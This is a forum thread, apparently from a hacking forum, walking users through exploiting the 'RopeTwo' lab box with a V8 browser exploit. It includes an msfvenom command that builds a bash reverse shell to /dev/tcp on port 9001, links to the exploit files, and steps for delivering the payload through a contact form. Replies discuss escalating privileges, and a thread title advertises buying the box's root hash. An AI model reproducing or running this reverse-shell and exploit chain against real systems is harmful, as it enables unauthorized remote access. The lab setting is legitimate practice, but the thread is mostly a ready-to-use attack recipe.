TUTORIAL RopeTwo
by terobau - October 27, 2020 at 04:48 PM
#1
Here comes the exploit for rope2, this will only give you the shell in the box. User Part coming soon.

first create two files. index.html and pwn.js

copy the contents from following link and make sure to change ip in index.html
for index.html

https://ghostbin.co/paste/3arp6c2

for pwn.js

https://ghostbin.co/paste/7sprd

generate shellcode

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'


replace the your generated shellcode with the shellcode in pwn.js [line: 94]

now start python http server on port 8080[if you want to change port make sure to change it on index.html too] and netcat listner on your selected port[use same port that you used while generating shellcode]

head over to http://10.10.10.196:8000/contact

type anything in name and subject but paste the contents of index.html in message box, click on send
if everything works fine you should gave a shell as chromeuser

for those who want to know what's going on
https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

v8 used in rope2 box is exactly compiled the with same patch as show in blog, but later pointer compression was added the exploit shown in blog works no more, tweaking exploit little bit should work.


Have a sweet reverse shell
Reply
#2
thank you!!! Please someone bring a nobel prize for this guy
Reply
#3
thank you but there is no any user.txt ad its permission denied to access r4j
Reply
#4
really you got the shell with this
scripts lolz
Reply
#5
(October 30, 2020 at 02:24 AM)lamehacker Wrote: really you got the shell with this
scripts lolz


why?
do you have any problem?
Reply
#6
(October 30, 2020 at 03:21 AM)terobau Wrote:
(October 30, 2020 at 02:24 AM)lamehacker Wrote: really you got the shell with this
scripts lolz


why?
do you have any problem?

the server dont get my page. idont know why
Reply
#7
Bro Thanks a lot, It's perfectly work, I have a shell with user chromeuser, now I try got user flag

(October 27, 2020 at 04:48 PM)terobau Wrote: Here comes the exploit for rope2, this will only give you the shell in the box. User Part coming soon.

first create two files. index.html and pwn.js

copy the contents from following link and make sure to change ip in index.html
for index.html

https://ghostbin.co/paste/3arp6c2

for pwn.js

https://ghostbin.co/paste/7sprd

generate shellcode

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'


replace the your generated shellcode with the shellcode in pwn.js [line: 94]

now start python http server on port 8080[if you want to change port make sure to change it on index.html too] and netcat listner on your selected port[use same port that you used while generating shellcode]

head over to http://10.10.10.196:8000/contact

type anything in name and subject but paste the contents of index.html in message box, click on send
if everything works fine you should gave a shell as chromeuser

for those who want to know what's going on
https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

v8 used in rope2 box is exactly compiled the with same patch as show in blog, but later pointer compression was added the exploit shown in blog works no more, tweaking exploit little bit should work.


Have a sweet reverse shell

Bro Thanks a lot i have give rep+2
Reply
#8
anyone moved on to user until now?
Reply
#9
use /usr/bin/rshell to escalate to r4j
Reply
#10
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j

But how can i escalate from this binary?
Reply
#11
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j


nice, a restricted shell. But how to escape ?
Reply
#12
(November 02, 2020 at 04:55 PM)mandoline Wrote:
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j


nice, a restricted shell. But how to escape ?

use google and there is a website that has the enough documentation about this shell and how do  they work
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
BUYING ROPETWO ROOT HASH (Buying) 0xvijay 2 250 November 23, 2020 at 03:54 PM
Last Post: 0xvijay
TUTORIAL RopeTwo kiddohacker 4 1,282 November 20, 2020 at 04:15 AM
Last Post: 0xvijay
TUTORIAL RopeTwo fr0z3nsp4z3 3 895 October 25, 2020 at 11:59 AM
Last Post: fr0z3nsp4z3

 Users browsing this thread: 2 Guest(s)